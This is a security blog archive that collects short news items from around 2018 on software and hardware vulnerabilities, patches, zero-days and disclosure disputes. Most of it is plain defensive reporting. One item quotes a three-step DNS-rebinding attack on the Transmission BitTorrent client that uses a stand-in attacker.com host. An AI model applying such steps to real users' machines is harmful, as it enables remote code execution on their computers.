Category Archives: Vulnerability

Dell EMC plugs critical bugs in VMAX enterprise storage offerings

Dell EMC has patched two critical flaws in vApp Manager, the management interface for its VMAX enterprise storage systems, and is urging all customers to implement fixes as soon as possible. About the VMAX enterprise storage vulnerabilities The flaws were discovered and reported by Tenable’s director of reverse engineering Carlos Perez. The graver of the two is CVE-2018-1216, which marks the existence of a hard-coded password vulnerability. “The vApp Manager contains an undocumented default account … More

How cybercriminals exploited Telegram flaw to deliver malware

A “vulnerability” in Telegram’s desktop instant messaging client for Windows was exploited for months by Russian cybercriminals to deliver malware to users. Kaspersky Lab researchers discovered in October 2017 that the flaw – which is actually more of a loophole, really – was being actively exploited. They notified Telegram about the issue, and sometime between then and now the loophole was closed by the developers. “We don’t have exact information about how long and which … More

Hackers Exploiting ‘Bitmessage’ Zero-Day to Steal Bitcoin Wallet Keys

Bitmessage developers have warned of a critical 'remotely executable' zero-day vulnerability in the PyBitmessage application that was being exploited in the wild. Bitmessage is a Peer-to-Peer (P2P) communications protocol used to send encrypted messages to users. Since it is decentralized and trustless communications, one need-not inherently trust any entities like root certificate

DoubleDoor IoT Botnet Abuses Two Vulnerabilities to Circumvent Firewalls, Modems

The DoubleDoor Internet of Things (IoT) botnet circumvents firewall protection and other security measures by abusing two vulnerabilities. Detected by NewSky Security in its honeypot logs, DoubleDoor begins by deploying CVE-2015-7755. The vulnerability allows remote attackers to gain administrative access to ScreenOS, an operating system for Juniper Networks’ hardware firewall devices, by entering a hardcoded […]… Read More

The post DoubleDoor IoT Botnet Abuses Two Vulnerabilities to Circumvent Firewalls, Modems appeared first on The State of Security.

Hackers Exploit ‘Telegram Messenger’ Zero-Day Flaw to Spread Malware

A zero-day vulnerability has been discovered in the desktop version for end-to-end encrypted Telegram messaging app that was being exploited in the wild in order to spread malware that mines cryptocurrencies such as Monero and ZCash. The Telegram vulnerability was uncovered by security researcher Alexey Firsh from Kaspersky Lab last October and affects only the Windows client of Telegram

AndroRAT Exploiting Vulnerability to Escalate Privileges on Android Devices

A new variant of the Android Remote Access Tool (AndroRAT) is exploiting a vulnerability to escalate privileges on unpatched Android devices. The malware disguises itself as a utility app called “TrashCleaner” and waits for users to download it from a malicious URL. Upon running for the first time, the malicious app forces the device to […]… Read More

The post AndroRAT Exploiting Vulnerability to Escalate Privileges on Android Devices appeared first on The State of Security.

Apple’s iOS source code leak – what you need to know

What’s happened?

Earlier this week someone anonymously published a key piece of Apple’s iOS source code onto GitHub.

Which bit of iOS was it?

It was an integral part of iOS known as “iBoot” – the section of code which controls the security of your iPhone or iPad as it starts up.

So it’s an important part of iOS?

Very important and highly sensitive. The secure boot firmware ensures that iOS will only run apps digitally signed by Apple, and checks that the operating system has not been tampered with by a hacker.

Does that make this leak interesting to hackers?

Yes, and to other parties (I’m looking at you principally law enforcement agencies) who might be interested in finding vulnerabilities that could be exploited to help them compromise and unlock iOS devices.

So finding a vulnerability in iOS’s boot-up code could be pretty valuable?

Put it this way. Apple’s bug bounty program is prepared to pay you up to $200,000 for vulnerabilities you uncover in its secure boot firmware components. Chances are that there are others out there (intelligence agencies, for instance) who may be prepared to pay you even more.

Would Apple want code like that leaked to the public?

Definitely not. Apple is famous for its secrecy, and its desire to control information. Don’t believe me? If you’ve got a good memory you may recall the lengths it has gone to in its attempts to retrieve prototype iPhones when they have fallen into the laps of the media.

But more importantly than that – Apple knows that having access to this critical source code could provide a head-start for attackers looking for ways to exploit the operating system.

Give me some good news

As Motherboard describes, the leaked code appears to be for iOS version 9, which was released in September 2015.

Phew! I’m running iOS 11

Good for you! Unfortunately there’s a high chance that portions of the leaked code have remained the same in iOS 11. Furthermore, there are believed to be tens of millions of older iPhones and iPads in circulation that are still running iOS 9 as they are unable to be updated.

I think I still have an old iPad that only runs iOS 9. What should i do with it?

Sadly, from the security point of view, it’s coming to the end of its natural life. If you have devices running iOS 9 then you probably need to start thinking about moving to something else – at least for anything critical such as email or online banking – as they are no longer receiving security updates.

Also, always take care about the links which you click on – as you could be taken to a boobytrapped webpage designed to exploit a security hole that isn’t patched on your iOS 9 device.

So, I need more good news.

The code is no longer available on GitHub. Apple acted promptly after the first revelation that the sensitive source code had leaked and issued a DMCA legal notice demanding it be taken down.

However, anyone who was keen to get their hands on the code is now certain to have it in their possession.

Take care out there.

Server-side exploits dominate the threat landscape

Skybox Security released its inaugural Vulnerability and Threat Trends Report, which analyzes vulnerabilities, exploits and threats in play in 2017. Cybercrime is a money–making machine A trend observed for the last several years has seen threat actors turn cybercrime into a money–making machine. An integral part of this approach means taking the path of least resistance: leveraging existing attack tools rather than developing new ones, using the same attack on as many victims as possible … More

WordPress Update Breaks Automatic Update Feature—Apply Manual Update

WordPress administrators are once again in trouble. WordPress version 4.9.3 was released earlier this week with patches for a total 34 vulnerabilities, but unfortunately, the new version broke the automatic update mechanism for millions of WordPress websites. WordPress team has now issued a new maintenance update, WordPress 4.9.4, to patch this severe bug, which WordPress admins have to

Intel releases new Spectre microcode updates for some affected processors

Intel has provided a new update on the Spectre patch situation. Skylake fix ready, others to follow “Earlier this week, we released production microcode updates for several Skylake-based platforms to our OEM customers and industry partners, and we expect to do the same for more platforms in the coming days,” Navin Shenoy, general manager of the Data Center Group at Intel Corporation, has announced on Wednesday. “We also continue to release beta microcode updates so … More

Smashing Security #064: So just a ‘teeny tiny’ security issue then?

Smashing Security #064: So just a 'teeny tiny' security issue then?

A Namecheap vulnerability allows strangers to make subdomains for your website, Troy Hunt examines password length, and ex-Google and Facebook employees are fighting to protect kids from social media addiction.

All this and much much more is discussed in the latest edition of the "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, who are joined this week by special guest HaveIBeenPwned's Troy Hunt.

Hotspot Shield VPN flaw can betray users’ location

A flaw in the widely used Hotspot Shield VPN utility can be exploited by attackers to obtain sensitive information that could be used to discover users’ location and, possibly and ultimately, their real-world identity. About the vulnerability According to the entry for the vulnerability (CVE-2018-6460) in the National Vulnerability Database, Hotspot Shield runs a webserver with a static IP address 127.0.0.1 and port 895, and the web server uses JSONP and hosts sensitive information including … More

Flaw in Grammarly’s extensions opened user accounts to compromise

A vulnerability in the Grammarly Chrome and Firefox extensions allowed websites to read users’ authentication tokes and use to them to log in to the users’ Grammarly accounts and access all the (potentially sensitive) information held in them. About the vulnerability The vulnerability was discovered by Google project Zero researcher Tavis Ormandy, who reported it to Grammarly on Friday. “I’m calling this a high severity bug because it seems like a pretty severe violation of … More

Cisco issues new, complete fixes for critical flaw in enterprise security appliances

Cisco researchers have identified additional attack vectors and features that are affected by the “perfect 10” remote code execution and denial of service vulnerability they attempted to patch last Tuesday. This discovery also means that the fix they pushed out at the time is incomplete, and administrators now have to update the vulnerable software again. More on CVE-2018-0101 Initially, they thought that the vulnerability (CVE-2018-0101) only affected the webvpn feature of the Cisco Adaptive Security … More

Security hole meant Grammarly would fix your typos, but let snoopers read your every word

A Google vulnerability researcher has found a gaping security hole in a popular web browser extension, that could have potentially exposed your private writings on the internet.

The Grammarly real-time spelling and grammar checker, which has over seven million daily users, describes itself as all you need to ensure that “everything you type is clear, effective, and mistake-free.”

As someone who is prone to getting muddled over whether to use “less” or “fewer”, or how to spell “accommodation”, I can certainly understand its appeal.

But by constantly looking over your shoulder at everything you type online, you want to be sure that Grammarly is taking proper care over the information it is proof-reading for you.

Perhaps, then, poor spellers around the world should be grateful that vulnerability hunter extraordinaire Tavis Ormandy of Google’s Project Zero group appears to have found what he described as a “high severity bug” before it was uncovered by anybody more malicious.

Ormandy discovered that a simple piece of JavaScript hidden on a malicious website could secretly trick the Grammarly extension for Firefox and Chrome into handing over a user’s authentication token.

With such a token, a malicious hacker could log into your Grammarly account, access Grammarly’s online editor, and unlock your “documents, history, logs, and all other data.”

The good news is that Grammarly responded with impressive speed after being informed of the problem by Ormandy. Even though the Google security researcher gave Grammarly 90 days to fix the issue, it was actually resolved within a few hours – a response time that Ormandy described as “really impressive.”

Grammarly turned to Twitter to reassure users that it had rolled out a patch for the bug, and that exploitation of the vulnerability was limited to text saved in the Grammarly Editor.

“This bug did not affect the Grammarly Keyboard, the Grammarly Microsoft Office add-in, or any text typed on websites while using the browser extension.”

“The bug is fixed, and there is no action required by our users.”

With an automatic update already rolled out to the Firefox and Chrome extension libraries, chances are that the problem has been fixed before it could be maliciously exploited. All the same, it’s impossible to be 100% certain that Tavis Ormandy was the first person in the world to uncover this particular bug – so it always makes sense to keep your eye open for suspicious activity.

Grammarly Fixes Vulnerability that Exposes Users’ Data for All Websites

Grammarly has fixed a vulnerability that exposes users’ typos, documents, and other data for all websites with which they’ve used the platform. Tavis Ormandy, a Google computer security researcher who discovered a memory disclosure bug in CloudFlare’s reverse-proxy systems in February 2017, wrote up a security advisory about the Grammarly flaw on 2 February. In […]… Read More

The post Grammarly Fixes Vulnerability that Exposes Users’ Data for All Websites appeared first on The State of Security.

Critical Flaw in Grammarly Spell Checker Could Let Attackers Steal Your Data

A critical vulnerability discovered in the Chrome and Firefox browser extension of the grammar-checking software Grammarly inadvertently left all 22 million users' accounts, including their personal documents and records, vulnerable to remote hackers. According to Google Project Zero researcher Tavis Ormandy, who discovered the vulnerability on February 2, the Chrome and Firefox extension of

Unpatched DoS Flaw Could Help Anyone Take Down WordPress Websites

A simple yet serious application-level denial of service (DoS) vulnerability has been discovered in WordPress CMS platform that could allow anyone to take down most WordPress websites even with a single machine—without hitting with a massive amount of bandwidth, as required in network-level DDoS attacks to achieve the same. Since the company has denied patching the issue, the vulnerability (

Three Leaked NSA Exploits Rewritten to Affect All Windows OSes Since Windows 2000

The WannaCry and NotPetya outbreaks were by far among the most significant digital attack campaigns that took place in 2017. Together, the crypto-ransomware and wiper malware affected hundreds of thousands of computers all over the world. They achieved this reach by abusing EternalBlue. Allegedly developed by the U.S. National Security Agency (NSA) and leaked online […]… Read More

The post Three Leaked NSA Exploits Rewritten to Affect All Windows OSes Since Windows 2000 appeared first on The State of Security.

Attacks Leveraging Adobe Zero-Day (CVE-2018-4878) – Threat Attribution, Attack Scenario and Recommendations

On Jan. 31, KISA (KrCERT) published an advisory about an Adobe Flash zero-day vulnerability (CVE-2018-4878) being exploited in the wild. On Feb. 1, Adobe issued an advisory confirming the vulnerability exists in Adobe Flash Player 28.0.0.137 and earlier versions, and that successful exploitation could potentially allow an attacker to take control of the affected system.

FireEye began investigating the vulnerability following the release of the initial advisory from KISA.

Threat Attribution

We assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper. We have observed TEMP.Reaper operators directly interacting with their command and control infrastructure from IP addresses assigned to the STAR-KP network in Pyongyang. The STAR-KP network is operated as a joint venture between the North Korean Government's Post and Telecommunications Corporation and Thailand-based Loxley Pacific. Historically, the majority of their targeting has been focused on the South Korean government, military, and defense industrial base; however, they have expanded to other international targets in the last year. They have taken interest in subject matter of direct importance to the Democratic People's Republic of Korea (DPRK) such as Korean unification efforts and North Korean defectors.

In the past year, FireEye iSIGHT Intelligence has discovered newly developed wiper malware being deployed by TEMP.Reaper, which we detect as RUHAPPY. While we have observed other suspected North Korean threat groups such as TEMP.Hermit employ wiper malware in disruptive attacks, we have not thus far observed TEMP.Reaper use their wiper malware actively against any targets.

Attack Scenario

Analysis of the exploit chain is ongoing, but available information points to the Flash zero-day being distributed in a malicious document or spreadsheet with an embedded SWF file. Upon opening and successful exploitation, a decryption key for an encrypted embedded payload would be downloaded from compromised third party websites hosted in South Korea. Preliminary analysis indicates that the vulnerability was likely used to distribute the previously observed DOGCALL malware to South Korean victims.

Recommendations

Adobe stated that it plans to release a fix for this issue the week of Feb. 5, 2018. Until then, we recommended that customers use extreme caution, especially when visiting South Korean sites, and avoid opening suspicious documents, especially Excel spreadsheets. Due to the publication of the vulnerability prior to patch availability, it is likely that additional criminal and nation state groups will attempt to exploit the vulnerability in the near term.

FireEye Solutions Detections

FireEye Email Security, Endpoint Security with Exploit Guard enabled, and Network Security products will detect the malicious document natively. Email Security and Network Security customers who have enabled the riskware feature may see additional alerts based on suspicious content embedded in malicious documents. Customers can find more information in our FireEye Customer Communities post.

(Unpatched) Adobe Flash Player Zero-Day Exploit Spotted in the Wild

Another reason to uninstall Adobe Flash Player—a new zero-day Flash Player exploit has reportedly been spotted in the wild by North Korean hackers. South Korea's Computer Emergency Response Team (KR-CERT) issued an alert Wednesday for a new Flash Player zero-day vulnerability that's being actively exploited in the wild by North Korean hackers to target Windows users in South Korea. <!--

Mozilla plugs critical and easily exploitable flaw in Firefox

Firefox users would do well to upgrade to the browser’s latest release if they want to keep their computers safe from compromise. Released on Monday, Firefox 58.0.1 contains one but very important security fix that plugs a vulnerability arising from insufficient sanitization of HTML fragments in chrome-privileged documents. (In this context, chrome is not the popular Google browser, but a component of Firefox.) The vulnerability (CVE-2018-5124) is considered critical because a successful exploit could allow … More

Multiple zero-day vulnerabilities found in ManageEngine products

Digital Defense uncovered multiple, previously undisclosed vulnerabilities within several Zoho ManageEngine products. ManageEngine offers more than 90 tools to help manage IT operations, including networks, servers, applications, service desk, Active Directory, security, desktops, and mobile devices. Currently, the company claims to have more than 40,000 customers, including three out of every five Fortune 500 company. Vulnerability impact The discovered vulnerabilities allow unauthenticated file upload, blind SQL injection, authenticated remote code execution and user enumeration, potentially … More

Update Your Firefox Browser to Fix a Critical Remotely Exploitable Flaw

Mozilla has released an important update for its Firefox web browser to patch a critical vulnerability that could allow remote attackers to execute malicious code on computers running an affected version of the browser. The update comes just a week after the company rolled out its new Firefox Quantum browser, a.k.a Firefox 58, with some new features like improved graphics engine and

Cisco plugs critical hole in many of its enterprise security appliances

There’s an eminently exploitable remote code execution flaw in the Adaptive Security Appliance (ASA) Software running on a number of Cisco enterprise appliances, and admins are advised to plug the hole as soon as possible. The Cisco Product Security Incident Response Team (PSIRT) says that it is aware of public knowledge of the vulnerability, but not of any current malicious use of it. Nevertheless, active exploitation might be close at hand. Also, details about the … More

Cisco Fixes 10.0 CVSS-Scored RCE Bug Affecting Its ASA Software

Cisco has patched a remote code execution (RCE) vulnerability bearing a “perfect” CVSS score of 10.0 that affects its Adaptive Security Appliance (ASA) software. On 29 January, the American multinational technology conglomerate publicly recognized the security issue (CVE-2018-0101) and revealed that it affects the ASA software found in the following 10 Cisco products: 3000 Series […]… Read More

The post Cisco Fixes 10.0 CVSS-Scored RCE Bug Affecting Its ASA Software appeared first on The State of Security.

Lenovo Fingerprint Manager Pro is full of fail

Lenovo Fingerprint Manager Pro, a piece of software that allows users to log into their PCs or authenticate to configured websites using fingerprint recognition, has been found seriously wanting in the security department. The problems are several: the software contains a hard-coded password, and is accessible to all users with local non-administrative access to the system it is installed in. Also, the data it stores – users’ Windows logon credentials and fingerprint data, among other … More

Apple offers another Meltdown fix for Mac users…

For Apple users worried about the Spectre and Meltdown CPU security vulnerabilities, it’s been a busy and slightly confusing few weeks.

Smashing Security #062: Tinder spying, Amazon shoplifting, and petrol pump malware

Smashing Security #062: Tinder spying, Amazon shoplifting, and petrol pump malware

Your Tinder swipes can be spied upon, Amazon is opening high street stores that don't require any staff, and Russian fuel pumps are being infected with malware in an elaborate scheme to make large amounts of money.

With Carole on a top secret special assignment, it's left to security veteran Graham Cluley to discuss all this and much much more on the "Smashing Security" podcast with special guests David McClelland and Vanja Švajcer.

Critical Flaw Hits Popular Windows Apps Built With Electron JS Framework

A critical remote code execution vulnerability has been reported in Electron—a popular web application framework that powers thousands of widely-used desktop applications including Skype, Signal, Wordpress and Slack—that allows for remote code execution. Electron is an open-source framework that is based on Node.js and Chromium Engine and allows app developers to build cross-platform native

WordPress Plugin Fixes Bug Allowing Download of 100K+ Sites’ Subscriber Lists

A popular WordPress plugin has fixed a vulnerability that allowed an unauthenticated user to download the subscriber lists for more than 100,000 websites. Email Subscribers & Newsletters incorporated the fix into version 3.4.8 on 19 January after working closely with Dominykas Gelucevicius from ThreatPress, a company which offers security products and services for WordPress users. […]… Read More

The post WordPress Plugin Fixes Bug Allowing Download of 100K+ Sites’ Subscriber Lists appeared first on The State of Security.

Migrating to SAP HANA? How Can You Ensure Security of Your Business-Critical Data?

If your company runs SAP, there is a chance that you might be planning to adopt SAP HANA this year. Due to the speed with which the platform is being deployed in hybrid models, security might be overlooked, and any misconfigurations or vulnerabilities can result in millions of dollars in compliance costs if exploited by attackers or rogue insiders. In fact, the Ponemon Institute recently placed the average cost of data breaches impacting SAP systems at $4.5 million and revealed that 65 percent of companies had experienced one or more SAP breach within the last two years.

Business-Critical Data Under Attack

Cybercriminals are increasingly targeting SAP systems, and with good reason. According to an Onapsis report titled “The Tip of the Iceberg: Wild Exploitation and Cyberattacks on SAP Business Applications,” 87 percent of Forbes 2000 companies use SAP, and 76 percent of the world’s transaction revenue is processed by SAP systems.

SAP stores crown jewels such as critical business, personal and financial data, which requires managing myriad regulatory and compliance requirements. It also runs the most business-sensitive processes in the organization. According to Dark Reading, cybercriminals have demonstrated how SAP applications can be used as a steppingstone to sabotage oil and gas processes.

It stands to reason that you’ll need a security impact assessment and strategy for the move to SAP Business Suite 4 SAP HANA (SAP S/4HANA). That strategy must address external threats as well as governance, risk management and compliance in specific SAP components, such as segregation of duties and sensitive access, to reduce the overall risk. Plus, you’ll need to focus on protecting new capabilities enabled by SAP HANA.

Learn How to Manage a Successful SAP HANA Migration

On Jan. 25 at noon EST, Britta Simms, global SAP competency lead with IBM Security, will co-host a joint webinar with ERP Maestro, our SAP risk reporting and controls automation partner. In this webinar, Simms will walk through IBM’s HANA Assessment Tool approach to evaluating enterprise systems for the move to SAP HANA. She will cover threats both external and internal, including an analysis of security roles and authorizations, which are likely to change during a migration.

Join the Jan. 25 webinar: When moving to HANA, don’t leave security behind

IBM Security services can help reduce the vulnerabilities in the SAP systems that house your organization’s most valuable information. With the right combination of SAP monitoring, automated alerts and rapid responses, attacks can be disrupted in real time.

IBM offers flexible services for the full range of SAP systems to help you:

  • Assess SAP systems for vulnerabilities and compliance risks, tying business context into remediation planning processes.
  • Align your SAP security policies with the latest industry standards.
  • Help protect against known-but-unpublished vulnerabilities.
  • Leverage continuous monitoring and advanced threat protection against zero-day attacks.
  • Streamline auditing and compliance management.

Join us for Thursday’s webinar if your organization is planning or considering a move to SAP HANA. You’ll get real guidance on how to start the process to assess the impact the project would have on your business — not to mention your current SAP security design.

The post Migrating to SAP HANA? How Can You Ensure Security of Your Business-Critical Data? appeared first on Security Intelligence.

Smashing Security #061: Fallout over Hawaii missile false alarm

Smashing Security #061: Fallout over Hawaii missile false alarm

User interfaces and poor procedures lead to pandemonium in Hawaii, hackers are attempting to trick victims into opening cryptocurrency-related email attachments, and yet more pox-ridden apps are found in Android's Google Play store.

All this and much much more is discussed in latest edition of the "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Paul Ducklin.

Vulnerability in ISC BIND leads to DoS, patch today!

The Internet Systems Consortium has released security updates for BIND, the most widely used Domain Name System (DNS) software on the Internet, and a patch for ISC DHCP, its open source software that implements the Dynamic Host Configuration Protocol for connection to an IP network. BIND update The BIND update should be implemented as soon as possible: the vulnerability (CVE-2017-3145) can lead to denial-of-service and crash, and instances of that happening have been reported by … More

Hackers can execute malicious code through vulnerability in Transmission BitTorrent client

If you download content through the popular Transmission BitTorrent client, take a closer look at its security settings: a critical vulnerability has been detected by Google’s Project Zero reporting team.

According to the report published Tuesday, the flaw lets hackers execute malicious code and gain remote control of user PCs through their web browsers.

40 days after the report, because developers in charge of fixing the flaw didn’t apply the patch from Google researchers, researcher Tavis Ormandy posted a proof-of-concept attack based on a hacking technique called DNS rebinding.

“I’m finding it frustrating that the transmission developers are not responding on their private security list, I suggested moving this into the open so that distributions can apply the patch independently. I suspect they won’t reply, but let’s see,” Ormandy’s report says.

Ormandy wrote:

“The attack works like this:

  1. A user visits http://attacker.com.
  2. attacker.com has an <iframe> to attack.attacker.com, and have configured their DNS server to respond alternately with 127.0.0.1 and 123.123.123.123 (an address they control) with a very low TTL.
  3. When the browser resolves to 123.123.123.123, they serve HTML that waits for the DNS entry to expire, then they XMLHttpRequest to attack.attacker.com and have permission to read and set headers.”

The app is based on a server-client architecture. To download content, users install a daemon service locally and then go to a web-based interface.

“I regularly encounter users who do not accept that websites can access services on localhost or their intranet,” Ormandy wrote.

“These users understand that services bound to localhost are only accessible to software running on the local machine and that their browser is running on the local machine—but somehow believe that accessing a website “transfers” execution somewhere else. It does not work like that, but this is a common source of confusion.”

Ormandy tested his demo on Chrome and Firefox on Windows and Linux, but believes other platforms and browsers are vulnerable.

 

Flaw in Popular Transmission BitTorrent Client Lets Hackers Control Your PC Remotely

A critical vulnerability has been discovered in the widely used Transmission BitTorrent app that could allow hackers to remotely execute malicious code on BitTorrent users' computers and take control of them. The vulnerability has been uncovered by Google's Project Zero vulnerability reporting team, and one of its researchers Tavis Ormandy has also posted a proof-of-concept attack—just 40

Meltdown and Spectre: To patch or to concentrate on attack detection?

Patching to protect machines against Meltdown and Spectre attacks is going slow, and the provided patches, in some instances, lead to more problems than just slowdowns. In fact, Intel has admitted that they have “received reports from a few customers of higher system reboots after applying firmware updates.” “Specifically, these systems are running Intel Broadwell and Haswell CPUs for both client and data center,” Navin Shenoy, general manager of Intel’s Data Center Group, confirmed. “We … More

Intel AMT security issue gives attackers complete control over a laptop

F-Secure reports a security issue affecting most corporate laptops that allows an attacker with physical access to backdoor a device in less than 30 seconds. The issue allows the attacker to bypass the need to enter credentials, including BIOS and Bitlocker passwords and TPM pins, and to gain remote access for later exploitation. It exists within Intel’s Active Management Technology (AMT) and potentially affects millions of laptops globally. The simple yet dangerous security issue The … More

New Intel AMT Security Issue Lets Hackers Gain Full Control of Laptops in 30 Seconds

It's been a terrible new-year-starting for Intel. Researchers warn of a new attack which can be carried out in less than 30 seconds and potentially affects millions of laptops globally. As Intel was rushing to roll out patches for Meltdown and Spectre vulnerabilities, security researchers have discovered a new critical security flaw in Intel hardware that could allow hackers to access

WhatsApp flaw could allow anyone to sneak into your private group chat

Let's hope that WhatsApp responds appropriately to the researchers' findings, and plugs this security hole before the threat evolves from being purely theoretical to real life.

The post WhatsApp flaw could allow anyone to sneak into your private group chat appeared first on The State of Security.

Smashing Security #060: Meltdown, Spectre, and personal devices in the White House

Smashing Security #060: Meltdown, Spectre, and personal devices in the White House

The chips are down, as tech companies struggle to protect against the Meltdown and Spectre flaws. The White House is getting tough on leakers by banning personal devices from the West Wing. And someone has been embedding a Bitcoin wallet into their hand...

All this and much much more is discussed in latest edition of the "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by David McClelland.

Trivial Software Flaws Continue to Plague Networked Devices

Western Digital My Cloud NAS Devices Contain Multiple Vulnerabilities

It’s 2018, but it feels like 2008.  I often reflect on how relatively simplistic the attack surface of nearly everything was just 10 years ago, and how much we’ve evolved since then.  I remember writing exploits for trivial buffer overflows without having to deal with exception handling, address randomization, stack and heap execution protections, and many other significant enhancements to operating systems, browsers and software in general.  As the years passed, we started to see software vendors making tangible progress in the areas of secure coding and vulnerability mitigations.  The most popular exploits tended to be in the browser space, and as such we saw an increasingly rapid response from browser vendors over the years as they struggled to gain or maintain market share in an aggressively contested market.  With the evolution of sandboxing and containerization, popular browsers such as Internet Explorer and Chrome began to raise the bar on what it took to execute malicious code.  Bypass mitigations, such as MemGC in the Microsoft Edge browser were implemented to reduce the number of trivial use-after-free vulnerabilities.  Operating systems have been hardened with new features such as VBS in Windows 10 (no not Visual Basic Scripting) to provide virtualization-based security for protection of critical systems and data.  It would be great if I could just end this discussion here, and we could all go home feeling great about the future of information security.  Unfortunately, not everyone is aboard this train.  Specifically, device manufacturers continue to deprioritize the necessity of secure code in order to get faster, larger and more feature-rich products to market quickly.

Western Digital is by no means any worse an offender in this area than others, but after reading the latest vulnerability disclosures in its ubiquitous network storage device known as My Cloud, I felt it was necessary to provide some basic insight to the industry about the implications and effects of insecure software development.  The principal problem is not that these devices contain vulnerabilities; even software vendors such as Apple, which pours millions of dollars and dedicated security teams into securing its operating system, have been bitten (pun intended) by asinine security flaws.  The High Sierra empty password root authentication bypass is a good example of this.

No, the problem lies in the complete lack of interest in developing secure code.  Even someone with zero software development experience could probably look at the following code and see the issue; spoiler alert, it’s a classic backdoor:

It leads me to ask the simple question – how are hardcoded backdoors still a thing?  Even if you can get past the myriad of early-millennium-style vulnerabilities reported in this disclosure, why won’t device manufacturers make the relatively small investment to review the code of the products they are selling worldwide?  Automated tools exist for this, and even a junior-level security practitioner could likely uncover some of these flaws.  Every year brings another collection of similar disclosures, yet the bar stays the same.  Simple format string abuse, rudimentary authentication bypasses, command injections and buffer overflows just to name a few.  Of equal importance, beyond simple coding errors, is that the basic concept of designing in a backdoor or adding one to an existing design is a well-known mistake. Resources such as IEEE’s Center For Secure Design’s “Avoiding the Top 10 Security Design Flaws” have been readily available for years.

I think a big part of the problem is the sheer noise.  You’d be hard pressed to find a software or device manufacturer out there who hasn’t been exposed to some negative press based on vulnerabilities reported in its products.  After enough exposure, consumers subconsciously begin to tune this noise out and it becomes the de facto standard for the products they buy; a “tax”, if you will, where they carry much of the risk, in this case the potential theft of personal data and privacy.

It begs the question of what can be done to improve this process and move the industry as a whole towards better security practices.  We’d like to challenge vendors to invest in secure development, code review and patching and mitigation strategies.  At McAfee, we try our best to practice what we preach.  We’ve made our own mistakes, and we’ve adapted from those experiences in an ongoing effort to fundamentally improve the way we build products.  It’s also time that consumers demand more from vendors; ultimately, the consumer carries the most significant tool of all, your decision about which products you buy and your mandate for security accountability.  Within McAfee’s Advanced Threat Research team, we firmly believe in the process of responsible disclosure and the openness of the research community in finding and reporting similar issues.  Whenever possible, we will continue to work directly with vendors who answer this call, in order to find and effectively eliminate vulnerabilities through the disclosure process.

Devices such as Western Digital’s My Cloud may fall under the purview of a consumer economy that pushes for cheaper technology with an abstract expectation of “security”. Still, software security is at the point where the “rubber meets the road”, where theory turns into practice which in turn is delivered in the devices that we use and hope we can trust.  Only with increased visibility and a shared set of priorities can we make hardcoded backdoors and other trivial security flaws truly, a thing of the past.

The post Trivial Software Flaws Continue to Plague Networked Devices appeared first on McAfee Blogs.

Vulnerability Spotlight: Ruby Rails Gem XSS Vulnerabilities

Vulnerabilities discovered by Zachary Sanchez of Cisco ASIG

Overview


Talos has discovered two XSS vulnerabilities in Ruby Rails Gems. Rails is a Ruby framework designed to create web services or web pages. Ruby Gems is a package manager for distributing software packages as 'gems'. The two XSS vulnerabilities were discovered in two different gem packages: delayed_job_web and rails_admin.

Ruby is widely used as a language for web development. Gem packages allow software engineers to reuse code across multiple development projects. As such, the discovery of a vulnerability in a gem may mean that many different systems are affected by that vulnerability.



Details

TALOS-2017-0449 (CVE-2017-12097) - delayed_job_web rails gem XSS vulnerability

An exploitable XSS vulnerability exists in the filter functionality of the delayed_job_web rails gem version 1.4. A specially crafted URL can cause an XSS flaw resulting in an attacker being able to execute arbitrary javascript on the victim's browser. The vulnerability can be used to phish users or steal cookies from connected users.

More details can be found in the vulnerability report:

TALOS-2017-0449

TALOS-2017-0450 (CVE-2017-12098) - rails_admin rails gem XSS vulnerability

This is an additional exploitable XSS vulnerability that exists in the filter functionality of the rails_admin rails gem version 1.2.0. In the same way at the above vulnerability, a specially crafted URL can be used to execute arbitrary javascript to phish users or steal cookies.

More details can be found in the vulnerability report:

TALOS-2017-0450

Coverage


The following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.

Snort Rules: 44380, 44381

Post-hack, VTech has to pay $650,000 in FTC settlement – but doesn’t have to admit any wrongdoing

Post-hack, VTech has to pay $650,000 in FTC settlement

The FTC settlement, one of the first reached with an internet-enabled toy manufacturer over security and privacy concerns, lets the firm off the hook in one key area: it doesn't require VTech to admit to any wrongdoing.

Read more in my article on the Bitdefender BOX blog.

Meltdown and Spectre: Breakdown of The recent CPU Security Bug




Much like how Icarus flew too close to the sun.In trying to catch up with Moors law the CPU's manufacturers have left open a serious vulnerability that will haunt us for years to come.

Whats the cause for the vulnerability ?

Almost all modern CPU's have a feature called "Speculative execution" which increases speed by predicting the path of a branch which is most likely to be taken, and will speculatively continue execution down that path even before the branch is completed.

What is Meltdown and Spectre?

Both exploits abuse speculative execution to access "privileged memory" and allows a lower privilege user process to read them.

So why is this a big issue ?

One of the core security mechanisms is isolation of programs. Most programs run in an isolated space and they can only access their own data and information. This stops malicious programs from reading/modifying others. This vulnerability breaks this core security principle and since the vulnerability is in the hardware level any software patch is limited in capacity.

Essentially almost all the rules that protect programs in a computer from each other are now null and void.

How does this affect me ?

This would allow for any process in user memory.  For example, JavaScript running on a browser to read sensitive information in memory eg: sessions, passwords etc. This would also allow programs running in lower privileges to read kernel memory. Cloud service providers who heavily rely on isolation are also affected.

There are innumerable combinations of attacks possible due to this vulnerability. We will be seeing many more "exploits" that make use of this vulnerability for specific systems and programs in the future.
POC:







How are they different ?


Meltdown breaks the mechanism that keeps applications from accessing arbitrary system memory. Consequently, applications can access system memory. Spectre tricks other applications into accessing arbitrary locations in their memory. Both attacks use side channels to obtain the information from the accessed memory location.
Spectre is easier to fix than Meltdown.

Why is it called Meltdown?

The bug basically melts security boundaries which are normally enforced by the hardware.

Why is it called Spectre?

The name is based on the root cause, speculative execution. As it is not easy to fix, it will haunt us for quite some time.

How do I know if I am vulnerable ?

Almost all Intel processor made since 1995 are vulnerable to Meltdown.

Almost all devices Desktops,Laptops,Smartphones etc are affected by Spectre. Vulnerability has been verified on AMD, Intel and ARM processors.

How do I patch ?

Please have a look at this great list that gizmodo provides:

https://gizmodo.com/check-this-list-to-see-if-you-re-still-vulnerable-to-me-1821780843

System Admins Please have a look at:
https://support.microsoft.com/en-us/help/4073119/protect-against-speculative-execution-side-channel-vulnerabilities-in (Requires powershell v5)

